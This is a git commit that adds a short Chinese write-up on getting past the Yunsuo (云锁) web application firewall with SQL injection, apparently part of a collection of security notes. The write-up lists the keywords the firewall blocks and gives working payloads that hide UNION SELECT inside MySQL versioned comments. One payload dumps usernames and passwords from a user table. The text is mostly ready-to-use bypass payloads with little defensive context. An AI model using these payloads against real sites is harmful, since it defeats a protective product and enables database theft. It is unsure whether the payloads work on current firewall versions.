add bypass云锁注入测试.md

2025-08-13 03:17:26 +00:00 · 2020-04-06 14:44:41 +08:00 · 2020-04-06 14:44:41 +08:00 · 810c7f7b10
commit 810c7f7b10
parent 49198c1cd9
6 changed files with 39 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -326,6 +326,7 @@
 - [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf)
 - [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf)
 - [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI)
+- [bypass云锁注入测试](./books/bypass云锁注入测试.md)

 ## <span id="head9"> 说明</span>

--- a/books/bypass云锁注入测试.md
+++ b/books/bypass云锁注入测试.md
@ -0,0 +1,38 @@
+## bypass云锁注入测试
+
+**实验环境**
+刚去云锁官网下的
+
+Apache/2.4.23
+
+PHP/5.4
+
+mysql 5
+
+**Paylaod**
+
+`order by `拦截
+
+![](../img/bypass_yunshuo4.png)
+
+`order/*!10000by*/5 `  
+
+![](../img/bypass_yunshuo3.png)  
+
+union  不拦截
+select  不拦截
+union select 拦截
+union 各种字符 select 拦截
+`union/*select*/ `不拦截
+
+`union%20/*!10000all%20select*/%201,2,database/**/(),4,5`  
+
+![](../img/bypass_yunshuo1.png)  
+
+`union/*!10000all*//*!10000select+1,password,username*/,4,5%20from%20user`  
+
+![](../img/bypass_yunshuo2.png)
+
+来源:https://www.t00ls.net/articles-55793.html   
+
+欢迎大家投稿注册土司.
--- a/img/bypass_yunshuo1.png
+++ b/img/bypass_yunshuo1.png
--- a/img/bypass_yunshuo2.png
+++ b/img/bypass_yunshuo2.png
--- a/img/bypass_yunshuo3.png
+++ b/img/bypass_yunshuo3.png
--- a/img/bypass_yunshuo4.png
+++ b/img/bypass_yunshuo4.png